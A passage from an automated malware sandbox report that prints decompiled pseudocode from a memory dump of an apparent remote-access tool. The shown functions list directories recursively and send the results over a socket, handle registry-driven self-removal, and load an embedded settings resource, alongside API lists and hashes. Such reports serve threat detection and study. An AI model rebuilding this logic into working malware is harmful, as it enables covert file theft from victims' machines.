				_t267 =  *(_t279 - 0x18);
				E00742F93(_t186, _t284 - 0x18, E00742FB7(_t279 - 0x54, _t279 + 0x38, 0x7ac238), __eflags, _t279 + 0x50);
				_push(0x67);
				E00744AA4(_t186, _t267 + 4, _t124, __eflags);
				E00741FC7();
				_t206 = _t267 + 4;
				goto L10;
			}

0x007477ec
0x007477ec
0x007477f1
0x007477f6
0x007477ff
0x00747802
0x00747804
0x0074780d
0x00747812
0x00747816
0x00747819
0x0074781d
0x00747822
0x00747827
0x00747831
0x00747832
0x00747833
0x00747834
0x00747837
0x0074783c
0x0074783e
0x00747bf0
0x00747bf2
0x00000000
0x00747844
0x00747844
0x00747862
0x00747868
0x00747874
0x0074787a
0x0074787f
0x00747881
0x00747889
0x0074788e
0x00747895
0x0074789a
0x0074789d
0x0074789d
0x0074789e
0x0074789e
0x0074789e
0x00747881
0x007478af
0x007478b8
0x007478d4
0x007478d9
0x007478e8
0x00747902
0x00747904
0x0074790a
0x0074790f
0x00747912
0x00000000
0x00747914
0x00747914
0x0074791e
0x00747923
0x0074792b
0x00747933
0x00747938
0x0074793f
0x00747944
0x00000000
0x00747944
0x0074794c
0x0074794c
0x00747954
0x0074795a
0x0074795c
0x00000000
0x00000000
0x00747962
0x00747965
0x00747968
0x0074797e
0x00747985
0x00747a8c
0x00747a99
0x00747aad
0x00747abe
0x00747ad8
0x00747add
0x00747af1
0x00747af4
0x00747b91
0x00747b97
0x00747b9c
0x00000000
0x00747afa
0x00747b15
0x00747b1d
0x00747b22
0x00747b4c
0x00747b50
0x00747b56
0x00747b5b
0x00747b60
0x00747b63
0x00747b69
0x00747b74
0x00747b79
0x00747b7b
0x00000000
0x00747b7d
0x00747b7d
0x00747b84
0x00747b89
0x00000000
0x00747b89
0x00747b7b
0x0074798b
0x0074798b
0x00747990
0x00747996
0x00747996
0x00747999
0x0074799c
0x00000000
0x00000000
0x0074799e
0x007479a1
0x007479b8
0x007479b8
0x007479a3
0x007479a3
0x007479a7
0x007479a7
0x007479ab
0x00000000
0x007479ad
0x007479ad
0x007479b0
0x007479b3
0x007479b6
0x00000000
0x00000000
0x00000000
0x00000000
0x007479b6
0x007479ab
0x007479c1
0x007479c1
0x007479c3
0x00000000
0x007479c9
0x007479c9
0x007479ce
0x007479d4
0x007479d4
0x007479d7
0x007479da
0x00000000
0x00000000
0x007479dc
0x007479df
0x007479f6
0x007479f6
0x007479e1
0x007479e1
0x007479e5
0x007479e5
0x007479e9
0x00000000
0x007479eb
0x007479eb
0x007479ee
0x007479f1
0x007479f4
0x00000000
0x00000000
0x00000000
0x00000000
0x007479f4
0x007479e9
0x007479ff
0x007479ff
0x00747a01
0x00000000
0x00747a07
0x00747a2b
0x00747a30
0x00747a3c
0x00747a44
0x00747a49
0x00747a52
0x00747a57
0x00747a60
0x00747a67
0x00747a6c
0x00747a6e
0x00747a87
0x00000000
0x00747a70
0x00747a70
0x00747a77
0x00747a7c
0x00000000
0x00747a7c
0x00747a6e
0x00000000
0x00747a01
0x007479fa
0x007479fc
0x007479fc
0x00000000
0x007479fc
0x00000000
0x007479c3
0x007479bc
0x007479be
0x007479be
0x00000000
0x007479be
0x00747c17
0x00747c1d
0x00747c25
0x00747c2d
0x00747c35
0x00747c3d
0x00747c45
0x00747c52
0x0074796a
0x0074796b
0x00747971
0x00747971
0x00747974
0x00747974
0x00000000
0x00747974
0x00747ba4
0x00747ba9
0x00747baf
0x00747bd0
0x00747bd6
0x00747bdb
0x00747be3
0x00747be8
0x00000000

APIs

__EH_prolog.LIBCMT ref: 007477F1

Part of subcall function 00744A08: connect.WS2_32(?,007ADBA0,00000010), ref: 00744A23

Part of subcall function 00744AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00744B18

__CxxThrowException@8.LIBVCRUNTIME ref: 0074789E
FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 007478FC
FindNextFileW.KERNEL32(00000000,?), ref: 00747954
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0074796B

Part of subcall function 00744E0B: closesocket.WS2_32(?), ref: 00744E11

FindClose.KERNEL32(00000000), ref: 00747BA9

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Find$CloseFile$Exception@8FirstH_prologNextThrowclosesocketconnectsend
String ID:
API String ID: 2104358809-0
Opcode ID: e23ccfbdfff0d27126490ef2ec29bb6b6fd30734b61d3ea5cb34e0f37cfba1a9
Instruction ID: 53800f37e1a74f63382c881a5e1bafcedf2783a9427014b820108cf5a73b2506
Opcode Fuzzy Hash: e23ccfbdfff0d27126490ef2ec29bb6b6fd30734b61d3ea5cb34e0f37cfba1a9
Instruction Fuzzy Hash: 15C19272904119DBCB18FB60DC56AEDB379BF11310F904269F916A7192EF386F49CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0074D0B5, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88
sleepCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0074D0B5() {
				signed int _v32;
				void* _t13;
				void* _t22;
				signed int _t61;
				void* _t63;
				void* _t64;
				void* _t66;

				_t63 = (_t61 & 0xfffffff8) - 0x20;
				while(1) {
					_v32 = _v32 & 0x00000000;
					_t52 = E00741F95(0x7ac518);
					E00750885(_t10, "override",  &_v32);
					_t13 = _v32 - 1;
					if(_t13 == 0) {
						goto L5;
					}
					_t22 = _t13 - 1;
					if(_t22 == 0) {
						_push(1);
						_t67 = _t63 - 0x18;
						E00747350(0x7ac500, _t63 - 0x18, _t52, __eflags, 0x7ac500);
						_push(L"pth_unenc");
						E00750B4C(0x80000001, E00741EEB(E007572DA( &_v32, 0x7ac518)));
						E00741EF0();
						_push(1);
						E00742084(0x7ac500, _t67 + 0x20 - 0x18, "3.2.1 Pro");
						_push("v");
						E00750AA7(0x7ac518, E00741F95(0x7ac518));
						E0075015B();
						ExitProcess(0);
					}
					_t74 = _t22 != 1;
					if(_t22 != 1) {
						L6:
						Sleep(0xbb8);
						continue;
					}
					E0074AD84();
					L5:
					_push(1);
					_t64 = _t63 - 0x18;
					E00747350(0x7ac500, _t64, _t52, _t74, 0x7ac500);
					_push(L"pth_unenc");
					E00750B4C(0x80000001, E00741EEB(E007572DA( &_v32, 0x7ac518)));
					E00741EF0();
					_push(1);
					_t66 = _t64 + 0x20 - 0x18;
					E00742084(0x7ac500, _t66, "3.2.1 Pro");
					_push("v");
					E00750AA7(0x7ac518, E00741F95(0x7ac518));
					_t63 = _t66 + 0x20;
					goto L6;
				}
			}

0x0074d0bb
0x0074d0ca
0x0074d0ca
0x0074d0e0
0x0074d0e2
0x0074d0ed
0x0074d0f0
0x00000000
0x00000000
0x0074d0f2
0x0074d0f5
0x0074d174
0x0074d176
0x0074d17c
0x0074d181
0x0074d19f
0x0074d1ab
0x0074d1b0
0x0074d1bc
0x0074d1c1
0x0074d1cf
0x0074d1d7
0x0074d1de
0x0074d1de
0x0074d0f7
0x0074d0fa
0x0074d164
0x0074d169
0x00000000
0x0074d169
0x0074d0fc
0x0074d101
0x0074d101
0x0074d103
0x0074d109
0x0074d10e
0x0074d12c
0x0074d138
0x0074d13d
0x0074d13f
0x0074d149
0x0074d14e
0x0074d15c
0x0074d161
0x00000000
0x0074d161

APIs

Part of subcall function 00750885: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 007508A5
Part of subcall function 00750885: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 007508C3
Part of subcall function 00750885: RegCloseKey.ADVAPI32(?), ref: 007508CE

Sleep.KERNEL32(00000BB8), ref: 0074D169
ExitProcess.KERNEL32 ref: 0074D1DE

Strings

override, xrefs: 0074D0D4
pth_unenc, xrefs: 0074D10E, 0074D181
3.2.1 Pro, xrefs: 0074D144, 0074D1B7

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: 3.2.1 Pro$override$pth_unenc
API String ID: 2281282204-2083519672
Opcode ID: 0bc98fe6f66da59a8b4199edb5dd2666475742bf4eff2594640c7ed4d79fa955
Instruction ID: 1eb69d6e95cc52afc065d675bbfe55e518a273dceb5834721d06da9469e7edd6
Opcode Fuzzy Hash: 0bc98fe6f66da59a8b4199edb5dd2666475742bf4eff2594640c7ed4d79fa955
Instruction Fuzzy Hash: DB210871F50300EBD618B6744C5FA6E3696ABC2701F804918FC015B2C6EFAD9E5987D2

Uniqueness

Uniqueness Score: -1.00%

Function 0078A6BC, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0078A6BC(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t12 = _a8 + 8; // 0xfde8fe81
					if(GetLocaleInfoW( *_t12, 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x799fa8;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x799fb0;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E0077673F(_t23, _t23);
									goto L25;
								}
								_t8 = _a8 + 8; // 0xfde8fe81
								if(GetLocaleInfoW( *_t8, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x0078a6c1
0x0078a6c2
0x0078a6c9
0x0078a76d
0x0078a77b
0x0078a786
0x0078a78c
0x0078a791
0x0078a793
0x0078a793
0x0078a799
0x0078a79e
0x0078a79e
0x0078a788
0x0078a788
0x00000000
0x0078a788
0x0078a6cf
0x0078a6d4
0x00000000
0x00000000
0x0078a6da
0x0078a6df
0x0078a6e1
0x0078a6e1
0x0078a6e7
0x00000000
0x00000000
0x0078a6ec
0x0078a703
0x0078a703
0x0078a70c
0x0078a70e
0x00000000
0x00000000
0x0078a710
0x0078a715
0x0078a717
0x0078a717
0x0078a71d
0x00000000
0x00000000
0x0078a722
0x0078a740
0x0078a742
0x0078a765
0x00000000
0x0078a76a
0x0078a752
0x0078a75d
0x00000000
0x00000000
0x0078a75f
0x00000000
0x0078a75f
0x0078a724
0x0078a72c
0x00000000
0x00000000
0x0078a72e
0x0078a731
0x0078a737
0x00000000
0x00000000
0x00000000
0x0078a739
0x0078a73b
0x0078a73d
0x00000000
0x0078a73d
0x0078a6ee
0x0078a6f6
0x00000000
0x00000000
0x0078a6f8
0x0078a6fb
0x0078a701
0x00000000
0x00000000
0x00000000
0x0078a701
0x0078a707
0x0078a709
0x00000000

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0078A9DB,?,00000000), ref: 0078A755
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0078A9DB,?,00000000), ref: 0078A77E
GetACP.KERNEL32(?,?,0078A9DB,?,00000000), ref: 0078A793

Strings

OCP, xrefs: 0078A710
ACP, xrefs: 0078A6DA

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 97f031ff038d417340dd1d303cafc9c333aceacf245ed7e8396ee4e703ae008a
Instruction ID: d1b3b019a0305456e5d969c4efe5e0965f6453dcf3b6b3b17f3780f3909ea10c
Opcode Fuzzy Hash: 97f031ff038d417340dd1d303cafc9c333aceacf245ed7e8396ee4e703ae008a
Instruction Fuzzy Hash: B421D626680504B6FB30AF25CD01B9773B6EB50B50B5A8437E90AC7110E73EDD41E392

Uniqueness

Uniqueness Score: -1.00%

Function 00756C39, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00756C39(void** __ecx) {
				struct HRSRC__* _t1;
				void* _t3;
				long _t4;
				void** _t5;
				struct HRSRC__* _t7;

				_t5 = __ecx;
				_t1 = FindResourceA( *0x7abd28, "SETTINGS", 0xa);
				_t7 = _t1;
				if(_t7 != 0) {
					_t3 = LockResource(LoadResource( *0x7abd28, _t7));
					_t4 = SizeofResource( *0x7abd28, _t7);
					 *_t5 = _t3;
					return _t4;
				}
				return _t1;
			}

0x00756c48
0x00756c4a
0x00756c50
0x00756c54
0x00756c65
0x00756c74
0x00756c7a
0x00000000
0x00756c7c
0x00756c7f

APIs

FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 00756C4A
LoadResource.KERNEL32(00000000,?,?,?,0074CC70), ref: 00756C5E
LockResource.KERNEL32(00000000,?,?,?,0074CC70), ref: 00756C65
SizeofResource.KERNEL32(00000000,?,?,?,0074CC70), ref: 00756C74

Strings

SETTINGS, xrefs: 00756C3D

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SETTINGS
API String ID: 3473537107-594951305
Opcode ID: 72d36c4526f174d1400ff683f619299523de898a38fcc56e9de93b9c20a088b1
Instruction ID: 6af275bba6d389554c812d1185094fdced2f808a8119bcfce5a24a10b58d4f1b
Opcode Fuzzy Hash: 72d36c4526f174d1400ff683f619299523de898a38fcc56e9de93b9c20a088b1
Instruction Fuzzy Hash: 08E01A7A740658BBC7211BA5AC4CD163E79EFCBB627008026FA0192230D73E8801CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00747C55, Relevance: 7.7, APIs: 5, Instructions: 246
fileCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00747C55(intOrPtr __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t81;
				intOrPtr* _t83;
				signed int _t93;
				signed int _t98;
				intOrPtr* _t102;
				signed int _t126;
				signed int _t127;
				signed int _t128;
				signed int _t129;
				void* _t146;
				signed int _t147;
				intOrPtr _t150;
				char* _t171;
				char* _t172;
				char* _t211;
				void* _t215;
				void* _t219;
				void* _t221;
				intOrPtr _t222;
				void* _t223;
				void* _t225;
				void* _t226;

				_t226 = __eflags;
				_t150 = __ecx;
				E007910A8(E0079262C, _t219);
				_t222 = _t221 - 0x308;
				_push(_t146);
				 *((intOrPtr*)(_t219 - 0x10)) = _t222;
				 *((intOrPtr*)(_t219 - 0x18)) = _t150;
				E007420D5(_t146, _t219 - 0x5c);
				_t81 = E0074230A(_t219 + 0x20, _t219 - 0x1c);
				_t83 = E007422CD(_t219 + 0x20, _t219 - 0x20);
				E00748226(_t219 - 0x28,  *((intOrPtr*)(E0074230A(_t219 + 0x20, _t219 - 0x24))),  *_t83,  *_t81);
				_t223 = _t222 + 0xc;
				_t204 = _t219 + 8;
				_t215 = FindFirstFileW(E00741EEB(E00747514(_t219 - 0xbc, _t219 + 8, _t226, "*")), _t219 - 0x30c);
				 *(_t219 - 0x1c) = _t215;
				E00741EF0();
				if(_t215 != 0xffffffff) {
					_t147 = 0;
					__eflags = 0;
					while(1) {
						_t93 = FindNextFileW(_t215, _t219 - 0x30c);
						__eflags = _t93;
						if(_t93 == 0) {
							break;
						}
						_t211 =  *((intOrPtr*)(_t219 - 0x18));
						__eflags =  *_t211;
						if( *_t211 == 0) {
							__eflags =  *(_t219 - 0x30c) & 0x00000010;
							if(( *(_t219 - 0x30c) & 0x00000010) == 0) {
								L25:
								E0074427F(_t147, _t219 - 0x40, _t219 - 0x2e0);
								_t102 = E0074230A(_t219 - 0x40, _t219 - 0x28);
								_t217 = E007422CD(_t219 - 0x40, _t219 - 0x24);
								E00748226(_t219 - 0x44,  *((intOrPtr*)(E0074230A(_t219 - 0x40, _t219 - 0x20))),  *_t104,  *_t102);
								_t223 = _t223 + 0xc;
								__eflags = E00748097(_t219 - 0x40, _t219 + 0x20, _t147) - 0xffffffff;
								if(__eflags == 0) {
									L29:
									E00741EF0();
									_t215 =  *(_t219 - 0x1c);
									continue;
								}
								E00741FD1(_t219 - 0x5c, _t204, _t217, E007420AB(_t147, _t219 - 0x74, _t204, __eflags, _t219 - 0x30c, 0x250));
								E00741FC7();
								 *(_t219 - 4) = _t147;
								_t223 = _t223 - 0x18;
								_t204 = E00742F93(_t147, _t219 - 0x74, E0075739C(_t147, _t219 - 0x8c, _t219 + 8), __eflags, 0x7ac238);
								E00742F93(_t147, _t223, _t117, __eflags, _t219 - 0x5c);
								_push(0x66);
								__eflags = E00744AA4(_t147,  *((intOrPtr*)(_t219 - 0x18)) + 4, _t117, __eflags) - 0xffffffff;
								E00741FC7();
								E00741FC7();
								if((_t147 & 0xffffff00 | E00744AA4(_t147,  *((intOrPtr*)(_t219 - 0x18)) + 4, _t117, __eflags) == 0xffffffff) == 0) {
									 *(_t219 - 4) =  *(_t219 - 4) | 0xffffffff;
									_t147 = 0;
									__eflags = 0;
									goto L29;
								}
								E00741EF0();
								E00741FC7();
								E00741EF0();
								E00741EF0();
								_t98 = 0;
								L31:
								 *[fs:0x0] =  *((intOrPtr*)(_t219 - 0xc));
								return _t98;
							}
							_t171 = ".";
							_t126 = _t219 - 0x2e0;
							while(1) {
								_t204 =  *_t126;
								__eflags = _t204 -  *_t171;
								if(_t204 !=  *_t171) {
									break;
								}
								__eflags = _t204;
								if(_t204 == 0) {
									L13:
									_t127 = _t147;
									L15:
									__eflags = _t127;
									if(_t127 == 0) {
										goto L25;
									}
									_t172 = L"..";
									_t128 = _t219 - 0x2e0;
									while(1) {
										_t204 =  *_t128;
										__eflags = _t204 -  *_t172;
										if(_t204 !=  *_t172) {
											break;
										}
										__eflags = _t204;
										if(_t204 == 0) {
											L21:
											_t129 = _t147;
											L23:
											__eflags = _t129;
											if(__eflags != 0) {
												_push(_t172);
												_t204 = E00748250(_t147, _t219 - 0x8c, _t219 + 8, __eflags, E0074427F(_t147, _t219 - 0x74, _t219 - 0x2e0));
												E00748274(_t147, _t219 - 0xa4, _t132, _t211, __eflags);
												E00741EF0();
												E00741EF0();
												_t225 = _t223 - 0x18;
												E00747350(_t147, _t225, _t132, __eflags, _t219 + 0x20);
												_t223 = _t225 - 0x18;
												E00747350(_t147, _t223, _t204, __eflags, _t219 - 0xa4);
												E00747C55(_t211, _t204, __eflags);
												E00741EF0();
											}
											goto L25;
										}
										_t204 =  *((intOrPtr*)(_t128 + 2));
										_t29 =  &(_t172[2]); // 0x2e
										__eflags = _t204 -  *_t29;
										if(_t204 !=  *_t29) {
											break;
										}
										_t128 = _t128 + 4;
										_t172 =  &(_t172[4]);
										__eflags = _t204;
										if(_t204 != 0) {
											continue;
										}
										goto L21;
									}
									asm("sbb eax, eax");
									_t129 = _t128 | 0x00000001;
									__eflags = _t129;
									goto L23;
								}
								_t204 =  *((intOrPtr*)(_t126 + 2));
								_t26 =  &(_t171[2]); // 0x2e0000
								__eflags = _t204 -  *_t26;
								if(_t204 !=  *_t26) {
									break;
								}
								_t126 = _t126 + 4;
								_t171 =  &(_t171[4]);
								__eflags = _t204;
								if(_t204 != 0) {
									continue;
								}
								goto L13;
							}
							asm("sbb eax, eax");
							_t127 = _t126 | 0x00000001;
							__eflags = _t127;
							goto L15;
						}
						FindClose(_t215);
						L6:
						E00741FC7();
						E00741EF0();
						E00741EF0();
						_t98 = _t147;
						goto L31;
					}
					FindClose(_t215);
					E00741FC7();
					E00741EF0();
					E00741EF0();
					_t98 = 1;
					goto L31;
				}
				_t147 = 1;
				goto L6;
			}

0x00747c55
0x00747c55
0x00747c5a
0x00747c5f
0x00747c65
0x00747c68
0x00747c6b
0x00747c71
0x00747c7d
0x00747c8b
0x00747ca7
0x00747cac
0x00747cbb
0x00747cd8
0x00747cda
0x00747ce3
0x00747ceb
0x00747cf1
0x00747cf1
0x00747cf3
0x00747cfb
0x00747d01
0x00747d03
0x00000000
0x00000000
0x00747d09
0x00747d0c
0x00747d0f
0x00747d37
0x00747d3e
0x00747e2e
0x00747e38
0x00747e44
0x00747e57
0x00747e6e
0x00747e73
0x00747e83
0x00747e86
0x00747f3f
0x00747f42
0x00747f47
0x00000000
0x00747f47
0x00747ea4
0x00747eac
0x00747eb1
0x00747eb4
0x00747edb
0x00747edf
0x00747ee5
0x00747ef2
0x00747efb
0x00747f06
0x00747f0d
0x00747f39
0x00747f3d
0x00747f3d
0x00000000
0x00747f3d
0x00747f12
0x00747f1a
0x00747f22
0x00747f2a
0x00747f2f
0x00747f70
0x00747f73
0x00747f80
0x00747f80
0x00747d44
0x00747d49
0x00747d4f
0x00747d4f
0x00747d52
0x00747d55
0x00000000
0x00000000
0x00747d57
0x00747d5a
0x00747d71
0x00747d71
0x00747d7a
0x00747d7a
0x00747d7c
0x00000000
0x00000000
0x00747d82
0x00747d87
0x00747d8d
0x00747d8d
0x00747d90
0x00747d93
0x00000000
0x00000000
0x00747d95
0x00747d98
0x00747daf
0x00747daf
0x00747db8
0x00747db8
0x00747dba
0x00747dbc
0x00747ddc
0x00747de4
0x00747df0
0x00747df8
0x00747dfd
0x00747e06
0x00747e0b
0x00747e17
0x00747e1e
0x00747e29
0x00747e29
0x00000000
0x00747dba
0x00747d9a
0x00747d9e
0x00747d9e
0x00747da2
0x00000000
0x00000000
0x00747da4
0x00747da7
0x00747daa
0x00747dad
0x00000000
0x00000000
0x00000000
0x00747dad
0x00747db3
0x00747db5
0x00747db5
0x00000000
0x00747db5
0x00747d5c
0x00747d60
0x00747d60
0x00747d64
0x00000000
0x00000000
0x00747d66
0x00747d69
0x00747d6c
0x00747d6f
0x00000000
0x00000000
0x00000000
0x00747d6f
0x00747d75
0x00747d77
0x00747d77
0x00000000
0x00747d77
0x00747d12
0x00747d18
0x00747d1b
0x00747d23
0x00747d2b
0x00747d30
0x00000000
0x00747d30
0x00747f50
0x00747f59
0x00747f61
0x00747f69
0x00747f6e
0x00000000
0x00747f6e
0x00747ced
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00747C5A

Part of subcall function 00747514: char_traits.LIBCPMT ref: 0074752F

FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 00747CD2
FindNextFileW.KERNEL32(00000000,?), ref: 00747CFB
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00747D12

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Find$File$CloseFirstH_prologNextchar_traits
String ID:
API String ID: 3260228402-0
Opcode ID: 31a387378a0a41535a44069370a16c5c21836587caf01abc06351e4f76a2904c
Instruction ID: aa84dfe8869fa33e11b25c52b565bb27ded19b6d2d952a5fcbd4fd35b653a489
Opcode Fuzzy Hash: 31a387378a0a41535a44069370a16c5c21836587caf01abc06351e4f76a2904c
Instruction Fuzzy Hash: 40918432910018DBCB19FF60DC96AED7379BF20340F94426AE906A71A1EF385F4ACB50

Uniqueness

Uniqueness Score: -1.00%

Function 0078A890, Relevance: 7.7, APIs: 5, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0078A890(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed int* _v24;
				short* _v28;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed int* _t46;
				signed int _t47;
				short* _t48;
				int _t49;
				short* _t56;
				short* _t57;
				short* _t58;
				int _t66;
				int _t68;
				short* _t72;
				intOrPtr _t75;
				void* _t77;
				short* _t78;
				intOrPtr _t85;
				short* _t89;
				short* _t92;
				void* _t94;
				short** _t102;
				short* _t103;
				signed int _t105;
				signed short _t108;
				signed int _t109;
				void* _t110;

				_t39 =  *0x7aa00c; // 0x67a7e35e
				_v8 = _t39 ^ _t109;
				_t89 = _a12;
				_t105 = _a4;
				_v28 = _a8;
				_v24 = E00781CE2(_t89, __ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E00781CE2(_t89, __ecx, __edx);
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t92 = _t105 + 0x80;
				_t46 = _v24;
				 *_t46 = _t105;
				_t102 =  &(_t46[1]);
				 *_t102 = _t92;
				if(_t92 != 0 &&  *_t92 != 0) {
					_t85 =  *0x799fa4; // 0x17
					E0078A833(0, 0x799e90, _t85 - 1, _t102);
					_t46 = _v24;
					_t110 = _t110 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if( *_t48 == _t99) {
						goto L19;
					}
					E0078A1D0(_t92, _t99,  &_v20);
					_pop(_t92);
					goto L20;
				} else {
					_t72 =  *_t102;
					if(_t72 == 0 ||  *_t72 == _t99) {
						E0078A2B6(_t92, _t99,  &_v20);
					} else {
						E0078A21B(_t92, _t99,  &_v20);
					}
					_pop(_t92);
					if(_v20 != 0) {
						_t103 = 0;
						__eflags = 0;
						goto L25;
					} else {
						_t75 =  *0x799e8c; // 0x41
						_t77 = E0078A833(_t99, 0x799b80, _t75 - 1, _v24);
						_t110 = _t110 + 0xc;
						if(_t77 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t108 = E0078A6BC(_t92,  ~_t105 & _t105 + 0x00000100,  &_v20);
								_pop(_t94);
								__eflags = _t108;
								if(_t108 == 0) {
									goto L22;
								}
								__eflags = _t108 - 0xfde8;
								if(_t108 == 0xfde8) {
									goto L22;
								}
								__eflags = _t108 - 0xfde9;
								if(_t108 == 0xfde9) {
									goto L22;
								}
								_t56 = IsValidCodePage(_t108 & 0x0000ffff);
								__eflags = _t56;
								if(_t56 == 0) {
									goto L22;
								}
								_t57 = IsValidLocale(_v16, 1);
								__eflags = _t57;
								if(_t57 == 0) {
									goto L22;
								}
								_t58 = _v28;
								__eflags = _t58;
								if(__eflags != 0) {
									 *_t58 = _t108;
								}
								E00782616(_t89, _t94, _t99, _t103, _t108, __eflags, _v16,  &(_v24[0x94]), 0x55, _t103);
								__eflags = _t89;
								if(__eflags == 0) {
									L36:
									L23:
									return E0076FD1B(_v8 ^ _t109);
								}
								_t33 =  &(_t89[0x90]); // 0x77e3e1
								E00782616(_t89, _t94, _t99, _t103, _t108, __eflags, _v16, _t33, 0x55, _t103);
								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
								__eflags = _t66;
								if(_t66 == 0) {
									goto L22;
								}
								_t36 =  &(_t89[0x40]); // 0x77e341
								_t68 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
								__eflags = _t68;
								if(_t68 == 0) {
									goto L22;
								}
								_t38 =  &(_t89[0x80]); // 0x77e3c1
								E0077BB3C(_t38, _t108, _t38, 0x10, 0xa);
								goto L36;
							}
							L22:
							goto L23;
						}
						_t78 =  *_t102;
						_t103 = 0;
						if(_t78 == 0 ||  *_t78 == 0) {
							E0078A2B6(_t92, _t99,  &_v20);
						} else {
							E0078A21B(_t92, _t99,  &_v20);
						}
						_pop(_t92);
						goto L21;
					}
				}
			}

0x0078a898
0x0078a89f
0x0078a8a6
0x0078a8aa
0x0078a8ae
0x0078a8bc
0x0078a8c1
0x0078a8c2
0x0078a8c3
0x0078a8c4
0x0078a8cc
0x0078a8ce
0x0078a8d4
0x0078a8da
0x0078a8dd
0x0078a8df
0x0078a8e2
0x0078a8e6
0x0078a8ed
0x0078a8fa
0x0078a8ff
0x0078a902
0x0078a905
0x0078a905
0x0078a907
0x0078a90a
